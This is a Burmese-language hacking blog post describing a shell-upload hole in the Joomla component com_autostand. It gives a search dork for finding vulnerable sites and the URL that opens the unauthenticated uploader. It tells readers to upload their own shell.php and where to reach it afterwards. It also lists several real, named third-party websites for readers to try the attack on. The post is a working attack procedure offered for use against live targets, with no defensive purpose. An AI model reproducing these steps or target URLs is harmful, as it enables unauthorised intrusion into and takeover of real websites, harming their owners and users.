Joomla Component com_autostand shell upload Vulnerability

လာပါျပီ Joomla Hacking တစ္မ်ဳိးပါ.. ဒါေလးကေတာ့ File Uploader ကေန တင္ေပးရမွာျဖစ္ပါတယ္...
Dork : "inurl:com_autostand"
ကြ်န္ေတာ္ကေတာ့ ဥပမာအေနနဲ ့.. ေအာက္ကဆုိဒ္ေလးကိုအသုံးျပဳ ့လုိ္က္ပါ့မယ္..
http://www.maxoverdrive.ca/index.php?option=com_autostand&Itemid=27&func=viewcategory&id=0
ဘဲ ဆုိပါေတာ့ဗ်ာ.. အဲ့မွာ http://www.maxoverdrive.ca/ ေနာက္ကပာာေတြအကုန္လုံးကို ဖ်က္ျပီးေတာ့..
/index.php?option=com_autostand&func=newItem
လုိ ့ေျပာင္းထည့္ေပးလုိက္ရမွာျဖစ္ပါတယ္..
ဒါဆုိရင္ေအာက္ကပုံအတုိင္းေလးျဖစ္သြားပါျပီ.

http://www.maxoverdrive.ca//index.php?option=com_autostand&func=newItem
0ါးးးးးးးးးး ျမင္ၾကလားေတာ့မသိပါဘူး ဖုိင္ ေတြ Upload တင္ဖုိ ့ေပးထားတာ တစ္ဖြဲႏွစ္ဖြဲဘဲဗ်ာ..
ကဲ မိမိတုိ ့ရဲ ့ Shell ဖုိင္ေလးကို Upload တင္နုိင္ပါျပီ..
သင္တုိ ့ တင္လုိက္တဲ့ ၇ွဲဖုိင္ေတြ
localhost/path/images/autostand/images/shell.php
 မွာ ျပန္သြားၾကည့္ရမွာပါ..

http://www.maxoverdrive.ca/images/autostand/images/shell.php 

အဲ့လုိျပန္သြားၾကည့္ရမွာျဖစ္ပါတယ္.. ကဲ ေအာက္မွာစမ္းဖုိ ့လင့္ေလးေတြထပ္ေပးလိုက္မယ္..

http://www.karahan.be//index.php?option=com_autostand&func=newItem

http://www.maxoverdrive.ca//index.php?option=com_autostand&func=newItem

http://www.dohenysupplies.com/index.php?option=com_autostand&func=newItem

http://vcmauto.com//index.php?option=com_autostand&func=newItem

Please Give Us Your 1 Minute In Sharing This Post!

SOCIALIZE IT →

Tweet

FOLLOW US →

SHARE IT →

Powered By: BloggerYard.Com